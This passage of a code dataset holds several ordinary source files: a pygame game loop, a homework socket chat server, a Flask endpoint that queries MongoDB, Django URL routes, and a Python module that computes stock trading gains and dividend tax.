graphics.animate(counter_two, scroll, players, enemies)\r\n\r\n\r\n for event in pygame.event.get(): # event loop\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n # elif event.type == VIDEORESIZE:\r\n # screen = pygame.display.set_mode(event.dict['size'], HWSURFACE | DOUBLEBUF | RESIZABLE)\r\n # display = pygame.display.set_mode(event.dict['size'], HWSURFACE | DOUBLEBUF | RESIZABLE)\r\n # screen.blit(pygame.transform.scale(screen, event.dict['size']), (0, 0))\r\n # display.blit(pygame.transform.scale(display, event.dict['size']), (0, 0))\r\n # pygame.display.update()\r\n # counter += 1\r\n # clock.tick(FPS)\r\n\r\n\r\n\r\n if counter_two == FPS:\r\n counter_two = 0\r\n\r\n screen.blit(pygame.transform.scale(display, WINDOW_SIZE), (0, 0))\r\n pygame.display.update()\r\n counter += 1\r\n counter_two += 1\r\n clock.tick(FPS)\r\n", "sub_path": "Platformer.py", "file_name": "Platformer.py", "file_ext": "py", "file_size_in_byte": 51149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.time.Clock", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "graphics.Graphics", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "graphics.Player.get_model", "line_number": 43, "usage_type": "call"}, {"api_name": "graphics.Player", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "graphics.Enemy1.get_model", "line_number": 45, "usage_type": "call"}, {"api_name": "graphics.Enemy1", "line_number": 45, "usage_type": "attribute"}, {"api_name": "graphics.Enemy2.get_model", "line_number": 46, "usage_type": "call"}, {"api_name": "graphics.Enemy2", "line_number": 46, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "item.Item", "line_number": 106, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 128, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 129, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 130, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 203, "usage_type": "call"}, {"api_name": "item.Item", "line_number": 285, "usage_type": "call"}, {"api_name": "portal.Portal", "line_number": 325, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 332, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 344, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 392, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 393, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 522, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 525, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 527, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 530, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 543, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 624, "usage_type": "argument"}, {"api_name": "enemy.get_position", "line_number": 626, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 629, "usage_type": "argument"}, {"api_name": "player.get_position", "line_number": 631, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 645, "usage_type": "argument"}, {"api_name": "enemy.get_position", "line_number": 647, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 654, "usage_type": "argument"}, {"api_name": "player.get_position", "line_number": 656, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 675, "usage_type": "argument"}, {"api_name": "enemy.get_position", "line_number": 677, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 680, "usage_type": "argument"}, {"api_name": "player.get_position", "line_number": 682, "usage_type": "call"}, {"api_name": "item.Item", "line_number": 766, "usage_type": "argument"}, {"api_name": "portal.Portal", "line_number": 795, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 905, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 909, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 925, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 932, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 935, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 956, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 963, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 966, "usage_type": "call"}, {"api_name": "player.get_equipped_weapon", "line_number": 1041, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1043, "usage_type": "call"}, {"api_name": "player.get_has_new_weapon", "line_number": 1044, "usage_type": "call"}, {"api_name": "player.get_max_weapon_damage", "line_number": 1045, "usage_type": "call"}, {"api_name": "player.get_equipped_weapon", "line_number": 1046, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1055, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1059, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1062, "usage_type": "call"}, {"api_name": "player.get_equipped_weapon", "line_number": 1065, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1065, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1066, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1067, "usage_type": "call"}, {"api_name": "player.get_equipped_shield", "line_number": 1069, "usage_type": "call"}, {"api_name": "player.get_shields", "line_number": 1069, "usage_type": "call"}, {"api_name": "player.get_shields", "line_number": 1070, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1071, "usage_type": "call"}, {"api_name": "player.get_equipped_helmet", "line_number": 1073, "usage_type": "call"}, {"api_name": "player.get_helmets", "line_number": 1073, "usage_type": "call"}, {"api_name": "player.get_helmets", "line_number": 1074, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1075, "usage_type": "call"}, {"api_name": "player.get_equipped_necklace", "line_number": 1077, "usage_type": "call"}, {"api_name": "player.get_necklaces", "line_number": 1077, "usage_type": "call"}, {"api_name": "player.get_necklaces", "line_number": 1078, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1079, "usage_type": "call"}, {"api_name": "player.get_equipped_trinket", "line_number": 1081, "usage_type": "call"}, {"api_name": "player.get_all_trinkets", "line_number": 1081, "usage_type": "call"}, {"api_name": "player.get_all_trinkets", "line_number": 1082, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1083, "usage_type": "call"}, {"api_name": "player.get_active_potion", "line_number": 1086, "usage_type": "call"}, {"api_name": "player.get_healing_potions", "line_number": 1086, "usage_type": "call"}, {"api_name": "player.get_health", "line_number": 1086, "usage_type": "call"}, {"api_name": "player.get_healing_potions", "line_number": 1087, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1088, "usage_type": "call"}, {"api_name": "player.get_active_potion", "line_number": 1091, "usage_type": "call"}, {"api_name": "player.get_speed_potions", "line_number": 1091, "usage_type": "call"}, {"api_name": "player.get_speed_potions", "line_number": 1092, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1093, "usage_type": "call"}, {"api_name": "player.get_max_weapon_damage", "line_number": 1097, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1098, "usage_type": "call"}, {"api_name": "player.print_inventory", "line_number": 1099, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1101, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1102, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1103, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1109, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1114, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1119, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1123, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1126, "usage_type": "call"}, {"api_name": "player.get_position", "line_number": 1126, "usage_type": "call"}, {"api_name": "player.get_action", "line_number": 1128, "usage_type": "call"}, {"api_name": "enemy.set_action", "line_number": 1134, "usage_type": "call"}, {"api_name": "enemy.set_action", "line_number": 1138, "usage_type": "call"}, {"api_name": "enemy.set_action", "line_number": 1144, "usage_type": "call"}, {"api_name": "enemy.get_position", "line_number": 1144, "usage_type": "call"}, {"api_name": "enemy.get_action", "line_number": 1146, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 1182, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 1200, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 1203, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 1212, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 1230, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 1233, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 1266, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 1277, "usage_type": "argument"}, {"api_name": "graphics.animate", "line_number": 1309, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 1312, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 1312, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 1314, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 1315, "usage_type": "call"}, {"api_name": "pygame.transform.scale", "line_number": 1330, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 1330, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 1331, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 1331, "usage_type": "attribute"}]} +{"seq_id": "416676253", "text": "import sys, json, time, logging, logs.config.server_config_log, decorators, select\nfrom config import *\nfrom socket import *\n\nlog = logging.getLogger('Server_log')\nlogger = decorators.Log(log)\n\n# Функция чтения сообщений с сокетов клиентов\ndef read_messages(from_clients,client_list):\n #log.debug('Запуск функции получения сообщений от клиентов')\n global names\n # список всех полученных сообщений\n message_list = []\n for connection in from_clients:\n try:\n client_message = json.loads(connection.recv(1024).decode(\"utf-8\"))\n log.info(f'Принято сообщение от клиента: {client_message[FROM]}')\n log.debug(f'{client_message}')\n # Если спец сообщение от Admin, то вырубаем сервер\n if ACTION in client_message and \\\n client_message[ACTION] == 'Stop server' and \\\n client_message[FROM] == 'Admin':\n log.info(f'Получена команда выключения сервера, ответ: {RESPONSE}: {SHUTDOWN}')\n return {RESPONSE: SHUTDOWN}\n message_list.append((client_message,connection))\n except:\n log.debug(f'Клиент {connection.fileno()} {connection.getpeername()} отключился до передачи сообщения по таймауту ')\n names = {key: val for key, val in names.items() if val != connection}\n client_list.remove(connection)\n return message_list\n\n# Функция записи сообщений в сокеты клиентов\ndef write_messages(messages,to_clients, client_list):\n global names\n #log.debug('Запуск функции отправки сообщений клиентам')\n\n for message, sender in messages:\n # Если приватный канал, то отправка только одному получателю\n if message[ACTION] == MSG and message[TO] != MAIN_CHANNEL and message[TO] != message[FROM]:\n # получаем пользователя, которому отправляем сообщение\n to = message[TO]\n # обработка сервером команды who\n if message[MESSAGE] != 'who':\n message[MESSAGE] = f'(private){message[FROM]}:> {message[MESSAGE]}'\n try:\n connection = names[to]\n except:\n connection = names[message[FROM]]\n if message[TO] == SERVER and message[MESSAGE] == 'who':\n message[TO] = message[FROM]\n client_names = [key for key in names.keys()]\n message[MESSAGE] = f'<:SERVER:> Список клиентов в онлайн: {client_names}'\n log.debug(f'Пользователем {message[FROM]} запрошен список пользователей онлайн: {message[MESSAGE]}')\n else:\n message[TO] = message[FROM]\n message[FROM] = SERVER\n message[MESSAGE] = f'<:SERVER:> Клиент {to} не подключен. Отправка сообщения не возможна!'\n log.warning(message)\n # отправка сообщения\n try:\n connection.send(json.dumps(message).encode('utf-8'))\n except:\n log.warning(f'Сокет клиента {connection.fileno()} {connection.getpeername()} недоступен для отправки. Вероятно он отключился')\n names = {key: val for key, val in names.items() if val != connection}\n connection.close()\n client_list.remove(connection)\n # если общий канал, то отправка сообщения всем клиентам\n elif message[ACTION] == MSG and message[TO] == MAIN_CHANNEL:\n message[MESSAGE] = f'{message[FROM]}:> {message[MESSAGE]}'\n for connection in to_clients:\n # отправка сообщения\n try:\n connection.send(json.dumps(message).encode('utf-8'))\n except:\n log.warning(f'Сокет клиента {connection.fileno()} {connection.getpeername()} недоступен для отправки. Вероятно он отключился')\n names = {key: val for key, val in names.items() if val != connection}\n connection.close()\n client_list.remove(connection)\n\n# Функция проверки корректности приветственного сообщения и формирования ответа\n@logger\ndef check_correct_presence_and_response(presence_message):\n log.debug('Запуск ф-ии проверки корректности запроса')\n if ACTION in presence_message and presence_message[ACTION] == 'Unknown':\n return {RESPONSE: UNKNOWN_ERROR}\n elif ACTION in presence_message and \\\n presence_message[ACTION] == PRESENCE and \\\n TIME in presence_message and \\\n isinstance(presence_message[TIME], float):\n # Если всё хорошо шлем ОК\n log.debug(f'Проверка успешна, ответ: {RESPONSE}: {OK}')\n return {RESPONSE: OK}\n else:\n # Иначе шлем код ошибки\n log.warning(f'{RESPONSE}: {WRONG_REQUEST}, {ERROR}: \"Не верный запрос\"')\n return {RESPONSE: WRONG_REQUEST, ERROR: 'Не верный запрос'}\n\n@logger\ndef start_server(serv_addr=server_address, serv_port=server_port):\n alive = True\n global clients, names\n\n # создаем сокет для работы с клиентами\n with socket(AF_INET,SOCK_STREAM) as s:\n if not isinstance(serv_addr,str) or not isinstance(serv_port,int):\n log.error('Полученный адрес сервера или порт не является строкой или числом!')\n raise ValueError\n\n s.bind((serv_addr,serv_port))\n s.listen(1)\n s.settimeout(0.1)\n\n log.info('Запуск сервера! Готов к приему клиентов! \\n')\n\n while alive:\n try:\n # Прием запросов на подключение, проверка приветственного сообщения и ответ\n client, address = s.accept()\n client_message = json.loads(client.recv(1024).decode(\"utf-8\"))\n log.info(f'Принято сообщение от клиента: {client_message}')\n answer = check_correct_presence_and_response(client_message)\n client_name = client_message.get('user').get('account_name')\n log.info(f\"Приветствуем пользователя {client_name}!\")\n log.info(f'Отправка ответа клиенту: {answer}')\n client.send(json.dumps(answer).encode('utf-8'))\n except OSError as e:\n #за время socket timeout не было подключений\n pass\n else:\n log.info(f'Получен запрос на соединение от {str(address)}')\n names[client_name] = client\n clients.append(client)\n finally:\n r = []\n w = []\n e = []\n select_timeout = 0\n try:\n r, w, e = select.select(clients, clients, e, select_timeout)\n except:\n #исключение в случае дисконнекта любого из клиентов\n pass\n\n req = read_messages(r,clients)\n if req == {RESPONSE: SHUTDOWN}:\n alive = False\n log.info(f'Завершение работы сервера по команде от Admin')\n write_messages(req,w,clients)\n\n\n\nif __name__ == \"__main__\":\n # Проверка аргументов при запуске из консоли\n if len(sys.argv) > 1:\n for i in range(1,len(sys.argv)):\n if sys.argv[i] == '-p' and i+1 < len(sys.argv):\n server_port = sys.argv[i+1]\n if sys.argv[i] == '-a' and i+1 < len(sys.argv):\n server_address = sys.argv[i+1]\n\n #Показывать лог в консоль при запуске сервера напрямую\n server_stream_handler = logging.StreamHandler(sys.stdout)\n server_stream_handler.setLevel(logging.DEBUG)\n server_stream_handler.setFormatter(logs.config.server_config_log.log_format)\n log.addHandler(server_stream_handler)\n\n # Общие переменные для всех функций\n # Список сокетов клиентов и словарь аккаунтов клиентов с информацией о сокете\n clients = []\n names = {}\n\n start_server()\n sys.exit(0)", "sub_path": "Block3/Homework8/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 9291, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "decorators.Log", "line_number": 6, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 61, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 119, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 125, "usage_type": "call"}, {"api_name": "select.select", "line_number": 139, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 154, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 156, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 157, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 159, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 162, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 162, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 163, "usage_type": "attribute"}, {"api_name": "logs.config.server_config_log.config", "line_number": 164, "usage_type": "attribute"}, {"api_name": "logs.config.server_config_log", "line_number": 164, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "470834834", "text": "from flask import jsonify, request\nfrom flask_restful import Resource\nfrom common.utils.v1.mongodb import MongoDB\n\nclass GetPaperInfoByType(Resource):\n def get(self):\n pass\n\n def post(self):\n # Get json data\n data = request.get_json()\n # Json dat\n for_type = data['type']\n\n # Init MongoDB class\n try:\n mongodb_class = MongoDB('paper')\n except Exception as e:\n return 'Error: {}'.format(e), 400\n\n # Find more than one array document\n cursor = mongodb_class.find(\"information\", { \"type\": for_type })\n\n # Append document cursor to array\n obj = []\n for document in cursor:\n obj.append({\n \"algorithm\": document['algorithm'],\n \"algorithmLabel\": document['algorithmLabel'],\n \"styles\": document['styles'],\n \"paper\": document['paper'],\n 'link': document['link'],\n 'technique': document['technique'],\n 'authors': document['authors'],\n 'type': document['type']\n })\n\n # Return json array to client\n res = jsonify(obj)\n res.status_code = 200\n return res", "sub_path": "app/server/python/server/resources/v1/getPaperInfoByType.py", "file_name": "getPaperInfoByType.py", "file_ext": "py", "file_size_in_byte": 1229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_restful.Resource", "line_number": 5, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "common.utils.v1.mongodb.MongoDB", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "590905745", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('home',views.homepage),\n path('signup',views.prosignup),\n path('login',views.loginn),\n path('custsignup',views.cussignup),\n path('prorgstn',views.profsignup),\n path('custregstn',views.custsignup),\n path('',views.homepage),\n path('search',views.search),\n]", "sub_path": "homecareapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "172008319", "text": "from libs import (\n NAP_DIGIT_PRECISION,\n NAP_DIVIDEND_TAX,\n BNB_DATE_FORMAT,\n NAP_DATE_FORMAT,\n RECEIVED_DIVIDEND_ACTIVITY_TYPES,\n TAX_DIVIDEND_ACTIVITY_TYPES,\n)\nfrom libs.calculators.utils import get_avg_purchase_price, adjust_quantity, aggregate_purchases\n\nfrom collections import deque\nimport logging\n\nlogger = logging.getLogger(\"calculations\")\n\nimport decimal\n\ndecimal.getcontext().rounding = decimal.ROUND_HALF_UP\n\n\ndef calculate_win_loss(statements):\n purchases = {}\n sales = []\n for statement in statements:\n stock_symbol = statement.get(\"symbol\", None)\n\n if statement[\"activity_type\"] == \"BUY\":\n activity_quantity = abs(statement.get(\"quantity\", 0))\n\n logger.debug(\n f\"[BUY] [{stock_symbol}] td:[{statement['trade_date']}] qt:[{activity_quantity}] pr:[{statement['price']}] ex:[{statement['exchange_rate']}]\"\n )\n stock_queue = purchases.get(stock_symbol, deque())\n stock_queue.append(\n {\n \"price\": statement[\"price\"] * statement[\"exchange_rate\"],\n \"price_usd\": statement[\"price\"],\n \"quantity\": activity_quantity,\n \"trade_date\": statement[\"trade_date\"],\n }\n )\n purchases[stock_symbol] = stock_queue\n\n if statement[\"activity_type\"] == \"SELL\":\n activity_quantity = abs(statement.get(\"quantity\", 0))\n\n logger.debug(\n f\"[SELL] [{stock_symbol}] td:[{statement['trade_date']}] qt:[{activity_quantity}] pr:[{statement['price']}] ex:[{statement['exchange_rate']}]\"\n )\n\n if stock_symbol not in purchases or len(purchases[stock_symbol]) == 0:\n logging.warn(f\"No purchase information found for: [{stock_symbol}].\")\n continue\n\n stock_queue = purchases[stock_symbol]\n\n logger.debug(f\"Before adjustment: {stock_queue}\")\n\n avg_purchase_price = get_avg_purchase_price(stock_queue)\n logger.debug(f\"AVG price: [{avg_purchase_price}]\")\n\n purchase_price = avg_purchase_price * activity_quantity\n sell_price = statement[\"amount\"] * statement[\"exchange_rate\"]\n\n sale = {\n \"symbol\": stock_symbol,\n \"trade_date\": statement[\"trade_date\"].strftime(NAP_DATE_FORMAT),\n \"avg_purchase_price\": avg_purchase_price,\n \"purchase_price\": purchase_price.quantize(decimal.Decimal(NAP_DIGIT_PRECISION)),\n \"sell_price\": sell_price.quantize(decimal.Decimal(NAP_DIGIT_PRECISION)),\n \"sell_exchange_rate\": statement[\"exchange_rate\"].quantize(decimal.Decimal(NAP_DIGIT_PRECISION)),\n \"profit\": decimal.Decimal(0),\n \"loss\": decimal.Decimal(0),\n }\n\n profit_loss = (sale[\"sell_price\"] - sale[\"purchase_price\"]).quantize(decimal.Decimal(NAP_DIGIT_PRECISION))\n if profit_loss > 0:\n sale[\"profit\"] = profit_loss\n else:\n sale[\"loss\"] = profit_loss\n\n sales.append(sale)\n\n adjust_quantity(stock_queue, activity_quantity)\n logger.debug(f\"After adjustment: {purchases[stock_symbol]}\")\n\n if statement[\"activity_type\"] == \"SSP\" or statement[\"activity_type\"] == \"MAS\":\n activity_type = statement[\"activity_type\"]\n activity_quantity = statement[\"quantity\"]\n logger.debug(\n f\"[{activity_type}] [{stock_symbol}] td:[{statement['trade_date']}] qt:[{activity_quantity}] pr:[{statement['price']}] ex:[{statement['exchange_rate']}]\"\n )\n\n if activity_quantity < 0:\n stock_symbol = stock_symbol.replace(\".OLD\", \"\")\n if stock_symbol not in purchases or len(purchases[stock_symbol]) == 0:\n logging.warn(f\"No purchase information found for: [{stock_symbol}].\")\n continue\n\n stock_queue = purchases[stock_symbol]\n logger.debug(f\"Before surrender: {stock_queue}\")\n\n adjust_quantity(stock_queue, abs(activity_quantity))\n logger.debug(f\"After surrender: {stock_queue}\")\n continue\n\n stock_queue = purchases.get(stock_symbol, deque())\n logger.debug(f\"Before addition: {stock_queue}\")\n\n stock_queue.append(\n {\n \"price\": statement[\"price\"] * statement[\"exchange_rate\"],\n \"price_usd\": statement[\"price\"],\n \"quantity\": activity_quantity,\n \"trade_date\": statement[\"trade_date\"],\n }\n )\n logger.debug(f\"After addition: {stock_queue}\")\n\n return sales, calculate_remaining_purchases(purchases)\n\n\ndef calculate_remaining_purchases(purchases):\n result = {}\n for stock_symbol, stock_queue in aggregate_purchases(purchases).items():\n\n calculated_queue = []\n for purchase in stock_queue:\n calculated_queue.append(\n {\n **purchase,\n **{\n \"price_in_currency\": (purchase[\"price_usd\"] * purchase[\"quantity\"]).quantize(\n decimal.Decimal(NAP_DIGIT_PRECISION)\n ),\n \"price\": (purchase[\"price\"] * purchase[\"quantity\"]).quantize(\n decimal.Decimal(NAP_DIGIT_PRECISION)\n ),\n },\n }\n )\n result[stock_symbol] = calculated_queue\n\n return result\n\n\ndef calculate_dividends_tax(dividends):\n result = []\n for stock_symbol, stock_queue in dividends.items():\n for dividend in stock_queue:\n owe_tax = decimal.Decimal(0)\n if dividend[\"paid_tax_amount\"] == 0:\n owe_tax = dividend[\"gross_profit_amount\"] * decimal.Decimal(NAP_DIVIDEND_TAX)\n\n found_same_company_dividend = False\n for stock_data in result:\n if stock_data[\"stock_symbol\"] == stock_symbol:\n stock_data[\"paid_tax_amount\"] += dividend[\"paid_tax_amount\"]\n stock_data[\"gross_profit_amount\"] += dividend[\"gross_profit_amount\"]\n stock_data[\"owe_tax\"] += owe_tax\n found_same_company_dividend = True\n break\n\n if not found_same_company_dividend:\n result.append({**dividend, **{\"stock_symbol\": stock_symbol, \"owe_tax\": owe_tax}})\n return result\n\n\ndef calculate_dividends(statements):\n dividends = {}\n for statement in statements:\n\n if (\n statement[\"activity_type\"] in RECEIVED_DIVIDEND_ACTIVITY_TYPES\n or statement[\"activity_type\"] in TAX_DIVIDEND_ACTIVITY_TYPES\n ):\n stock_symbol = statement[\"symbol\"]\n activity_amount = statement[\"amount\"] * statement[\"exchange_rate\"]\n\n logger.debug(f\"[{statement['activity_type']}] [{stock_symbol}] am:[{activity_amount}]\")\n\n if statement[\"activity_type\"] in RECEIVED_DIVIDEND_ACTIVITY_TYPES:\n stock_queue = dividends.get(stock_symbol, deque())\n stock_queue.append(\n {\n \"company\": statement[\"company\"],\n \"gross_profit_amount\": activity_amount,\n \"paid_tax_amount\": decimal.Decimal(0),\n }\n )\n dividends[stock_symbol] = stock_queue\n continue\n\n if statement[\"activity_type\"] in TAX_DIVIDEND_ACTIVITY_TYPES:\n if stock_symbol not in dividends:\n logging.error(f\"No previous dividend information found for: [{stock_symbol}].\")\n raise SystemExit(1)\n\n stock_queue = dividends[stock_symbol]\n stock_queue[-1][\"paid_tax_amount\"] = (\n stock_queue[-1].get(\"paid_tax_amount\", decimal.Decimal(0)) + activity_amount\n )\n\n return calculate_dividends_tax(dividends)\n", "sub_path": "libs/calculators/default.py", "file_name": "default.py", "file_ext": "py", "file_size_in_byte": 8141, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "decimal.getcontext", "line_number": 18, "usage_type": "call"}, {"api_name": "decimal.ROUND_HALF_UP", "line_number": 18, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 52, "usage_type": "call"}, {"api_name": "libs.calculators.utils.get_avg_purchase_price", "line_number": 59, "usage_type": "call"}, {"api_name": "libs.NAP_DATE_FORMAT", "line_number": 67, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 69, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 69, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 70, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 70, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 71, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 71, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 72, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 73, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 76, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 76, "usage_type": "argument"}, {"api_name": "libs.calculators.utils.adjust_quantity", "line_number": 84, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 97, "usage_type": "call"}, {"api_name": "libs.calculators.utils.adjust_quantity", 